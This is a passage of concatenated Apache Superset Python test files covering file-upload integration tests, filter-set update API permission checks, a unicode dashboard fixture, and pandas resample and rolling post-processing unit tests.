types: Optional[Dict[str, TypeEngine]]
@dataclass
class Table:
table_name: str
table_metadata: TableMetaData
data: Iterable[Dict[Any, Any]]
class TableMetaDataFactory(ABC):
@abstractmethod
def make(self) -> TableMetaData:
...
def make_table(self, data: Iterable[Dict[Any, Any]]) -> Table:
metadata = self.make()
return Table(metadata.table_name, metadata, data)
```
#### File: tests/integration_tests/csv_upload_tests.py
```python
import json
import logging
import os
import shutil
from typing import Dict, Optional
from unittest import mock
import pandas as pd
import pytest
import superset.utils.database
from superset.sql_parse import Table
from superset import security_manager
from tests.integration_tests.conftest import ADMIN_SCHEMA_NAME
from tests.integration_tests.test_app import app # isort:skip
from superset import db
from superset.models.core import Database
from superset.utils import core as utils
from tests.integration_tests.base_tests import get_resp, login, SupersetTestCase
logger = logging.getLogger(__name__)
test_client = app.test_client()
CSV_UPLOAD_DATABASE = "csv_explore_db"
CSV_FILENAME1 = "testCSV1.csv"
CSV_FILENAME2 = "testCSV2.csv"
EXCEL_FILENAME = "testExcel.xlsx"
PARQUET_FILENAME1 = "testZip/testParquet1.parquet"
PARQUET_FILENAME2 = "testZip/testParquet2.parquet"
ZIP_DIRNAME = "testZip"
ZIP_FILENAME = "testZip.zip"
EXCEL_UPLOAD_TABLE = "excel_upload"
CSV_UPLOAD_TABLE = "csv_upload"
PARQUET_UPLOAD_TABLE = "parquet_upload"
CSV_UPLOAD_TABLE_W_SCHEMA = "csv_upload_w_schema"
CSV_UPLOAD_TABLE_W_EXPLORE = "csv_upload_w_explore"
@pytest.fixture(scope="module")
def setup_csv_upload():
with app.app_context():
login(test_client, username="admin")
upload_db = superset.utils.database.get_or_create_db(
CSV_UPLOAD_DATABASE, app.config["SQLALCHEMY_EXAMPLES_URI"]
)
extra = upload_db.get_extra()
extra["explore_database_id"] = superset.utils.database.get_example_database().id
upload_db.extra = json.dumps(extra)
upload_db.allow_file_upload = True
db.session.commit()
yield
upload_db = get_upload_db()
engine = upload_db.get_sqla_engine()
engine.execute(f"DROP TABLE IF EXISTS {EXCEL_UPLOAD_TABLE}")
engine.execute(f"DROP TABLE IF EXISTS {CSV_UPLOAD_TABLE}")
engine.execute(f"DROP TABLE IF EXISTS {PARQUET_UPLOAD_TABLE}")
engine.execute(f"DROP TABLE IF EXISTS {CSV_UPLOAD_TABLE_W_SCHEMA}")
engine.execute(f"DROP TABLE IF EXISTS {CSV_UPLOAD_TABLE_W_EXPLORE}")
db.session.delete(upload_db)
db.session.commit()
@pytest.fixture(scope="module")
def create_csv_files():
with open(CSV_FILENAME1, "w+") as test_file:
for line in ["a,b", "john,1", "paul,2"]:
test_file.write(f"{line}\n")
with open(CSV_FILENAME2, "w+") as test_file:
for line in ["b,c,d", "john,1,x", "paul,2,"]:
test_file.write(f"{line}\n")
yield
os.remove(CSV_FILENAME1)
os.remove(CSV_FILENAME2)
@pytest.fixture()
def create_excel_files():
pd.DataFrame({"a": ["john", "paul"], "b": [1, 2]}).to_excel(EXCEL_FILENAME)
yield
os.remove(EXCEL_FILENAME)
@pytest.fixture()
def create_columnar_files():
os.mkdir(ZIP_DIRNAME)
pd.DataFrame({"a": ["john", "paul"], "b": [1, 2]}).to_parquet(PARQUET_FILENAME1)
pd.DataFrame({"a": ["max", "bob"], "b": [3, 4]}).to_parquet(PARQUET_FILENAME2)
shutil.make_archive(ZIP_DIRNAME, "zip", ZIP_DIRNAME)
yield
os.remove(ZIP_FILENAME)
shutil.rmtree(ZIP_DIRNAME)
def get_upload_db():
return db.session.query(Database).filter_by(database_name=CSV_UPLOAD_DATABASE).one()
def upload_csv(filename: str, table_name: str, extra: Optional[Dict[str, str]] = None):
csv_upload_db_id = get_upload_db().id
schema = utils.get_example_default_schema()
form_data = {
"csv_file": open(filename, "rb"),
"sep": ",",
"name": table_name,
"con": csv_upload_db_id,
"if_exists": "fail",
"index_label": "test_label",
"mangle_dupe_cols": False,
}
if schema:
form_data["schema"] = schema
if extra:
form_data.update(extra)
return get_resp(test_client, "/csvtodatabaseview/form", data=form_data)
def upload_excel(
filename: str, table_name: str, extra: Optional[Dict[str, str]] = None
):
excel_upload_db_id = get_upload_db().id
schema = utils.get_example_default_schema()
form_data = {
"excel_file": open(filename, "rb"),
"name": table_name,
"con": excel_upload_db_id,
"sheet_name": "Sheet1",
"if_exists": "fail",
"index_label": "test_label",
"mangle_dupe_cols": False,
}
if schema:
form_data["schema"] = schema
if extra:
form_data.update(extra)
return get_resp(test_client, "/exceltodatabaseview/form", data=form_data)
def upload_columnar(
filename: str, table_name: str, extra: Optional[Dict[str, str]] = None
):
columnar_upload_db_id = get_upload_db().id
schema = utils.get_example_default_schema()
form_data = {
"columnar_file": open(filename, "rb"),
"name": table_name,
"con": columnar_upload_db_id,
"if_exists": "fail",
"index_label": "test_label",
}
if schema:
form_data["schema"] = schema
if extra:
form_data.update(extra)
return get_resp(test_client, "/columnartodatabaseview/form", data=form_data)
def mock_upload_to_s3(filename: str, upload_prefix: str, table: Table) -> str:
"""
HDFS is used instead of S3 for the unit tests.integration_tests.
:param filename: The file to upload
:param upload_prefix: The S3 prefix
:param table: The table that will be created
:returns: The HDFS path to the directory with external table files
"""
# only needed for the hive tests
import docker
client = docker.from_env()
container = client.containers.get("namenode")
# docker mounted volume that contains csv uploads
src = os.path.join("/tmp/superset_uploads", os.path.basename(filename))
# hdfs destination for the external tables
dest_dir = os.path.join("/tmp/external/superset_uploads/", str(table))
container.exec_run(f"hdfs dfs -mkdir -p {dest_dir}")
dest = os.path.join(dest_dir, os.path.basename(filename))
container.exec_run(f"hdfs dfs -put {src} {dest}")
# hive external table expectes a directory for the location
return dest_dir
```
#### File: dashboards/filter_sets/update_api_tests.py
```python
from __future__ import annotations
import json
from typing import Any, Dict, List, TYPE_CHECKING
from superset.dashboards.filter_sets.consts import (
DESCRIPTION_FIELD,
JSON_METADATA_FIELD,
NAME_FIELD,
OWNER_TYPE_FIELD,
PARAMS_PROPERTY,
)
from tests.integration_tests.base_tests import login
from tests.integration_tests.dashboards.filter_sets.consts import (
DASHBOARD_OWNER_USERNAME,
FILTER_SET_OWNER_USERNAME,
REGULAR_USER,
)
from tests.integration_tests.dashboards.filter_sets.utils import (
call_update_filter_set,
collect_all_ids,
get_filter_set_by_name,
)
if TYPE_CHECKING:
from flask.testing import FlaskClient
from superset.models.filter_set import FilterSet
def merge_two_filter_set_dict(
first: Dict[Any, Any], second: Dict[Any, Any]
) -> Dict[Any, Any]:
for d in [first, second]:
if JSON_METADATA_FIELD in d:
if PARAMS_PROPERTY not in d:
d.setdefault(PARAMS_PROPERTY, json.loads(d[JSON_METADATA_FIELD]))
d.pop(JSON_METADATA_FIELD)
return {**first, **second}
def assert_filterset_was_not_updated(filter_set_dict: Dict[str, Any]) -> None:
assert filter_set_dict == get_filter_set_by_name(filter_set_dict["name"]).to_dict()
def assert_filterset_updated(
filter_set_dict_before: Dict[str, Any], data_updated: Dict[str, Any]
) -> None:
expected_data = merge_two_filter_set_dict(filter_set_dict_before, data_updated)
assert expected_data == get_filter_set_by_name(expected_data["name"]).to_dict()
class TestUpdateFilterSet:
def test_with_dashboard_exists_filterset_not_exists__404(
self,
dashboard_id: int,
filtersets: Dict[str, List[FilterSet]],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
filter_set_id = max(collect_all_ids(filtersets)) + 1
response = call_update_filter_set(
client, {"id": filter_set_id}, {}, dashboard_id
)
# assert
assert response.status_code == 404
def test_with_dashboard_not_exists_filterset_not_exists__404(
self,
not_exists_dashboard_id: int,
filtersets: Dict[str, List[FilterSet]],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
filter_set_id = max(collect_all_ids(filtersets)) + 1
response = call_update_filter_set(
client, {"id": filter_set_id}, {}, not_exists_dashboard_id
)
# assert
assert response.status_code == 404
def test_with_dashboard_not_exists_filterset_exists__404(
self,
not_exists_dashboard_id: int,
dashboard_based_filter_set_dict: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, {}, not_exists_dashboard_id
)
# assert
assert response.status_code == 404
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_extra_field__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update["extra"] = "val"
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert response.json["message"]["extra"][0] == "Unknown field."
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_id_field__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update["id"] = 1
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert response.json["message"]["id"][0] == "Unknown field."
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_none_name__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[NAME_FIELD] = None
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_int_as_name__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[NAME_FIELD] = 4
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_without_name__200(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update.pop(NAME_FIELD, None)
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_with_none_description__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[DESCRIPTION_FIELD] = None
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_int_as_description__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[DESCRIPTION_FIELD] = 1
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_without_description__200(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update.pop(DESCRIPTION_FIELD, None)
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_with_invalid_json_metadata__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[DESCRIPTION_FIELD] = {}
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_json_metadata__200(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
valid_json_metadata: Dict[Any, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_json_metadata["nativeFilters"] = {"changed": "changed"}
valid_filter_set_data_for_update[JSON_METADATA_FIELD] = json.dumps(
valid_json_metadata
)
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_with_invalid_owner_type__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[OWNER_TYPE_FIELD] = "OTHER_TYPE"
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_user_owner_type__400(
self,
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[OWNER_TYPE_FIELD] = "User"
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 400
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
def test_with_dashboard_owner_type__200(
self,
user_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_update[OWNER_TYPE_FIELD] = "Dashboard"
# act
response = call_update_filter_set(
client, user_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
user_based_filter_set_dict["owner_id"] = user_based_filter_set_dict[
"dashboard_id"
]
assert_filterset_updated(
user_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_when_caller_is_admin_and_owner_type_is_user__200(
self,
test_users: Dict[str, int],
user_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
# act
response = call_update_filter_set(
client, user_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
user_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_when_caller_is_admin_and_owner_type_is_dashboard__200(
self,
test_users: Dict[str, int],
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_when_caller_is_dashboard_owner_and_owner_is_other_user_403(
self,
test_users: Dict[str, int],
user_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, DASHBOARD_OWNER_USERNAME)
# act
response = call_update_filter_set(
client, user_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 403
assert_filterset_was_not_updated(user_based_filter_set_dict)
def test_when_caller_is_dashboard_owner_and_owner_type_is_dashboard__200(
self,
test_users: Dict[str, int],
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, DASHBOARD_OWNER_USERNAME)
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_when_caller_is_filterset_owner__200(
self,
test_users: Dict[str, int],
user_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, FILTER_SET_OWNER_USERNAME)
# act
response = call_update_filter_set(
client, user_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 200
assert_filterset_updated(
user_based_filter_set_dict, valid_filter_set_data_for_update
)
def test_when_caller_is_regular_user_and_owner_type_is_user__403(
self,
test_users: Dict[str, int],
user_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, REGULAR_USER)
# act
response = call_update_filter_set(
client, user_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 403
assert_filterset_was_not_updated(user_based_filter_set_dict)
def test_when_caller_is_regular_user_and_owner_type_is_dashboard__403(
self,
test_users: Dict[str, int],
dashboard_based_filter_set_dict: Dict[str, Any],
valid_filter_set_data_for_update: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, REGULAR_USER)
# act
response = call_update_filter_set(
client, dashboard_based_filter_set_dict, valid_filter_set_data_for_update
)
# assert
assert response.status_code == 403
assert_filterset_was_not_updated(dashboard_based_filter_set_dict)
```
#### File: integration_tests/fixtures/unicode_dashboard.py
```python
import pandas as pd
import pytest
from sqlalchemy import String
from superset import db
from superset.connectors.sqla.models import SqlaTable
from superset.models.dashboard import Dashboard
from superset.models.slice import Slice
from superset.utils.core import get_example_default_schema
from superset.utils.database import get_example_database
from tests.integration_tests.dashboard_utils import (
create_dashboard,
create_slice,
create_table_metadata,
)
from tests.integration_tests.test_app import app
UNICODE_TBL_NAME = "unicode_test"
@pytest.fixture(scope="session")
def load_unicode_data():
with app.app_context():
_get_dataframe().to_sql(
UNICODE_TBL_NAME,
get_example_database().get_sqla_engine(),
if_exists="replace",
chunksize=500,
dtype={"phrase": String(500)},
index=False,
method="multi",
schema=get_example_default_schema(),
)
yield
with app.app_context():
engine = get_example_database().get_sqla_engine()
engine.execute("DROP TABLE IF EXISTS unicode_test")
@pytest.fixture()
def load_unicode_dashboard_with_slice(load_unicode_data):
slice_name = "Unicode Cloud"
with app.app_context():
dash = _create_unicode_dashboard(slice_name, None)
yield
_cleanup(dash, slice_name)
@pytest.fixture()
def load_unicode_dashboard_with_position(load_unicode_data):
slice_name = "Unicode Cloud"
position = "{}"
with app.app_context():
dash = _create_unicode_dashboard(slice_name, position)
yield
_cleanup(dash, slice_name)
def _get_dataframe():
data = _get_unicode_data()
return pd.DataFrame.from_dict(data)
def _get_unicode_data():
return [
{"phrase": "Под"},
{"phrase": "řšž"},
{"phrase": "視野無限廣"},
{"phrase": "微風"},
{"phrase": "中国智造"},
{"phrase": "æøå"},
{"phrase": "ëœéè"},
{"phrase": "いろはにほ"},
]
def _create_unicode_dashboard(slice_title: str, position: str) -> Dashboard:
table = create_table_metadata(UNICODE_TBL_NAME, get_example_database())
table.fetch_metadata()
if slice_title:
slice = _create_and_commit_unicode_slice(table, slice_title)
return create_dashboard("unicode-test", "Unicode Test", position, [slice])
def _create_and_commit_unicode_slice(table: SqlaTable, title: str):
slice = create_slice(title, "word_cloud", table, {})
o = db.session.query(Slice).filter_by(slice_name=slice.slice_name).one_or_none()
if o:
db.session.delete(o)
db.session.add(slice)
db.session.commit()
return slice
def _cleanup(dash: Dashboard, slice_name: str) -> None:
db.session.delete(dash)
if slice_name:
slice = db.session.query(Slice).filter_by(slice_name=slice_name).one_or_none()
db.session.delete(slice)
db.session.commit()
```
#### File: unit_tests/pandas_postprocessing/test_resample.py
```python
import numpy as np
import pandas as pd
import pytest
from pandas import to_datetime
from superset.exceptions import InvalidPostProcessingError
from superset.utils import pandas_postprocessing as pp
from tests.unit_tests.fixtures.dataframes import categories_df, timeseries_df
def test_resample_should_not_side_effect():
_timeseries_df = timeseries_df.copy()
pp.resample(df=_timeseries_df, rule="1D", method="ffill")
assert _timeseries_df.equals(timeseries_df)
def test_resample():
post_df = pp.resample(df=timeseries_df, rule="1D", method="ffill")
"""
label y
2019-01-01 x 1.0
2019-01-02 y 2.0
2019-01-03 y 2.0
2019-01-04 y 2.0
2019-01-05 z 3.0
2019-01-06 z 3.0
2019-01-07 q 4.0
"""
assert post_df.equals(
pd.DataFrame(
index=pd.to_datetime(
[
"2019-01-01",
"2019-01-02",
"2019-01-03",
"2019-01-04",
"2019-01-05",
"2019-01-06",
"2019-01-07",
]
),
data={
"label": ["x", "y", "y", "y", "z", "z", "q"],
"y": [1.0, 2.0, 2.0, 2.0, 3.0, 3.0, 4.0],
},
)
)
def test_resample_zero_fill():
post_df = pp.resample(df=timeseries_df, rule="1D", method="asfreq", fill_value=0)
assert post_df.equals(
pd.DataFrame(
index=pd.to_datetime(
[
"2019-01-01",
"2019-01-02",
"2019-01-03",
"2019-01-04",
"2019-01-05",
"2019-01-06",
"2019-01-07",
]
),
data={
"label": ["x", "y", 0, 0, "z", 0, "q"],
"y": [1.0, 2.0, 0, 0, 3.0, 0, 4.0],
},
)
)
def test_resample_after_pivot():
df = pd.DataFrame(
data={
"__timestamp": pd.to_datetime(
[
"2022-01-13",
"2022-01-13",
"2022-01-13",
"2022-01-11",
"2022-01-11",
"2022-01-11",
]
),
"city": ["Chicago", "LA", "NY", "Chicago", "LA", "NY"],
"val": [6.0, 5.0, 4.0, 3.0, 2.0, 1.0],
}
)
pivot_df = pp.pivot(
df=df,
index=["__timestamp"],
columns=["city"],
aggregates={
"val": {"operator": "sum"},
},
flatten_columns=False,
reset_index=False,
)
"""
val
city Chicago LA NY
__timestamp
2022-01-11 3.0 2.0 1.0
2022-01-13 6.0 5.0 4.0
"""
resample_df = pp.resample(
df=pivot_df,
rule="1D",
method="asfreq",
fill_value=0,
)
"""
val
city Chicago LA NY
__timestamp
2022-01-11 3.0 2.0 1.0
2022-01-12 0.0 0.0 0.0
2022-01-13 6.0 5.0 4.0
"""
flat_df = pp.flatten(resample_df)
"""
__timestamp val, Chicago val, LA val, NY
0 2022-01-11 3.0 2.0 1.0
1 2022-01-12 0.0 0.0 0.0
2 2022-01-13 6.0 5.0 4.0
"""
assert flat_df.equals(
pd.DataFrame(
data={
"__timestamp": pd.to_datetime(
["2022-01-11", "2022-01-12", "2022-01-13"]
),
"val, Chicago": [3.0, 0, 6.0],
"val, LA": [2.0, 0, 5.0],
"val, NY": [1.0, 0, 4.0],
}
)
)
def test_resample_should_raise_ex():
with pytest.raises(InvalidPostProcessingError):
pp.resample(
df=categories_df,
rule="1D",
method="asfreq",
)
with pytest.raises(InvalidPostProcessingError):
pp.resample(
df=timeseries_df,
rule="1D",
method="foobar",
)
def test_resample_linear():
df = pd.DataFrame(
index=to_datetime(["2019-01-01", "2019-01-05", "2019-01-08"]),
data={"label": ["a", "e", "j"], "y": [1.0, 5.0, 8.0]},
)
post_df = pp.resample(df=df, rule="1D", method="linear")
"""
label y
2019-01-01 a 1.0
2019-01-02 NaN 2.0
2019-01-03 NaN 3.0
2019-01-04 NaN 4.0
2019-01-05 e 5.0
2019-01-06 NaN 6.0
2019-01-07 NaN 7.0
2019-01-08 j 8.0
"""
assert post_df.equals(
pd.DataFrame(
index=pd.to_datetime(
[
"2019-01-01",
"2019-01-02",
"2019-01-03",
"2019-01-04",
"2019-01-05",
"2019-01-06",
"2019-01-07",
"2019-01-08",
]
),
data={
"label": ["a", np.NaN, np.NaN, np.NaN, "e", np.NaN, np.NaN, "j"],
"y": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0],
},
)
)
```
#### File: unit_tests/pandas_postprocessing/test_rolling.py
```python
import pandas as pd
import pytest
from superset.exceptions import InvalidPostProcessingError
from superset.utils import pandas_postprocessing as pp
from superset.utils.pandas_postprocessing.utils import FLAT_COLUMN_SEPARATOR
from tests.unit_tests.fixtures.dataframes import (
multiple_metrics_df,
single_metric_df,
timeseries_df,
)
from tests.unit_tests.pandas_postprocessing.utils import series_to_list
def test_rolling_should_not_side_effect():
_timeseries_df = timeseries_df.copy()
pp.rolling(
df=timeseries_df,
columns={"y": "y"},
rolling_type="sum",
window=2,
min_periods=0,
)
assert _timeseries_df.equals(timeseries_df)
def test_rolling():
# sum rolling type
post_df = pp.rolling(
df=timeseries_df,
columns={"y": "y"},
rolling_type="sum",
window=2,
min_periods=0,
)
assert post_df.columns.tolist() == ["label", "y"]
assert series_to_list(post_df["y"]) == [1.0, 3.0, 5.0, 7.0]
# mean rolling type with alias
post_df = pp.rolling(
df=timeseries_df,
rolling_type="mean",
columns={"y": "y_mean"},
window=10,
min_periods=0,
)
assert post_df.columns.tolist() == ["label", "y", "y_mean"]
assert series_to_list(post_df["y_mean"]) == [1.0, 1.5, 2.0, 2.5]
# count rolling type
post_df = pp.rolling(
df=timeseries_df,
rolling_type="count",
columns={"y": "y"},
window=10,
min_periods=0,
)
assert post_df.columns.tolist() == ["label", "y"]
assert series_to_list(post_df["y"]) == [1.0, 2.0, 3.0, 4.0]
# quantile rolling type
post_df = pp.rolling(
df=timeseries_df,
columns={"y": "q1"},
rolling_type="quantile",
rolling_type_options={"quantile": 0.25},
window=10,
min_periods=0,
)
assert post_df.columns.tolist() == ["label", "y", "q1"]
assert series_to_list(post_df["q1"]) == [1.0, 1.25, 1.5, 1.75]
# incorrect rolling type
with pytest.raises(InvalidPostProcessingError):
pp.rolling(
df=timeseries_df,
columns={"y": "y"},
rolling_type="abc",
window=2,
)
# incorrect rolling type options
with pytest.raises(InvalidPostProcessingError):
pp.rolling(
df=timeseries_df,
columns={"y": "y"},
rolling_type="quantile",
rolling_type_options={"abc": 123},
window=2,
)
def test_rolling_should_empty_df():
pivot_df = pp.pivot(
df=single_metric_df,
index=["dttm"],
columns=["country"],
aggregates={"sum_metric": {"operator": "sum"}},
flatten_columns=False,
reset_index=False,
)
rolling_df = pp.rolling(
df=pivot_df,
rolling_type="sum",
window=2,
min_periods=2,
columns={"sum_metric": "sum_metric"},
)
assert rolling_df.empty is True
def test_rolling_after_pivot_with_single_metric():
pivot_df = pp.pivot(
df=single_metric_df,
index=["dttm"],
columns=["country"],
aggregates={"sum_metric": {"operator": "sum"}},
flatten_columns=False,
reset_index=False,
)
"""
sum_metric
country UK US
dttm
2019-01-01 5 6
2019-01-02 7 8
"""
rolling_df = pp.rolling(
df=pivot_df,
columns={"sum_metric": "sum_metric"},
rolling_type="sum",
window=2,
min_periods=0,
)
"""
sum_metric
country UK US
dttm
2019-01-01 5.0 6.0
2019-01-02 12.0 14.0
"""
flat_df = pp.flatten(rolling_df)
"""
dttm sum_metric, UK sum_metric, US
0 2019-01-01 5.0 6.0
1 2019-01-02 12.0 14.0
"""
assert flat_df.equals(
pd.DataFrame(
data={
"dttm": pd.to_datetime(["2019-01-01", "2019-01-02"]),
FLAT_COLUMN_SEPARATOR.join(["sum_metric", "UK"]): [5.0, 12.0],
FLAT_COLUMN_SEPARATOR.join(["sum_metric", "US"]): [6.0, 14.0],
}
)
)
def test_rolling_after_pivot_with_multiple_metrics():
pivot_df = pp.pivot(
df=multiple_metrics_df,
index=["dttm"],
columns=["country"],
aggregates={
"sum_metric": {"operator": "sum"},
"count_metric": {"operator": "sum"},
},
flatten_columns=False,
reset_index=False,
)
"""
count_metric sum_metric
country UK US UK US
dttm
2019-01-01 1 2 5 6
2019-01-02 3 4 7 8
"""
rolling_df = pp.rolling(
df=pivot_df,
columns={
"count_metric": "count_metric",
"sum_metric": "sum_metric",
},
rolling_type="sum",
window=2,
min_periods=0,
)
"""
count_metric sum_metric
country UK US UK US
dttm
2019-01-01 1.0 2.0 5.0 6.0
2019-01-02 4.0 6.0 12.0 14.0
"""
flat_df = pp.flatten(rolling_df)
"""
dttm count_metric, UK count_metric, US sum_metric, UK sum_metric, US
0 2019-01-01 1.0 2.0 5.0 6.0
1 2019-01-02 4.0 6.0 12.0 14.0
"""
assert flat_df.equals(
pd.DataFrame(
data={
"dttm": pd.to_datetime(["2019-01-01", "2019-01-02"]),
FLAT_COLUMN_SEPARATOR.join(["count_metric", "UK"]): [1.0, 4.0],
FLAT_COLUMN_SEPARATOR.join(["count_metric", "US"]): [2.0, 6.0],
FLAT_COLUMN_SEPARATOR.join(["sum_metric", "UK"]): [5.0, 12.0],
FLAT_COLUMN_SEPARATOR.join(["sum_metric", "US"]): [6.0, 14.0],
}
)
)
```
#### File: tests/unit_tests/test_jinja_context.py
```python
import json
from typing import Any
import pytest
from flask.ctx import AppContext
from sqlalchemy.dialects.postgresql import dialect
from superset import app
from superset.exceptions import SupersetTemplateException
from superset.jinja_context import ExtraCache, safe_proxy
def test_filter_values_default(app_context: AppContext) -> None:
cache = ExtraCache()
assert cache.filter_values("name", "foo") == ["foo"]
assert cache.removed_filters == []
def test_filter_values_remove_not_present(app_context: AppContext) -> None:
cache = ExtraCache()
assert cache.filter_values("name", remove_filter=True) == []
assert cache.removed_filters == []
def test_get_filters_remove_not_present(app_context: AppContext) -> None:
cache = ExtraCache()
assert cache.get_filters("name", remove_filter=True) == []
assert cache.removed_filters == []
def test_filter_values_no_default(app_context: AppContext) -> None:
cache = ExtraCache()
assert cache.filter_values("name") == []
def test_filter_values_adhoc_filters(app_context: AppContext) -> None:
with app.test_request_context(
data={
"form_data": json.dumps(
{
"adhoc_filters": [
{
"clause": "WHERE",
"comparator": "foo",
"expressionType": "SIMPLE",
"operator": "in",
"subject": "name",
}
],
}
)
}
):
cache = ExtraCache()
assert cache.filter_values("name") == ["foo"]
assert cache.applied_filters == ["name"]
with app.test_request_context(
data={
"form_data": json.dumps(
{
"adhoc_filters": [
{
"clause": "WHERE",
"comparator": ["foo", "bar"],
"expressionType": "SIMPLE",
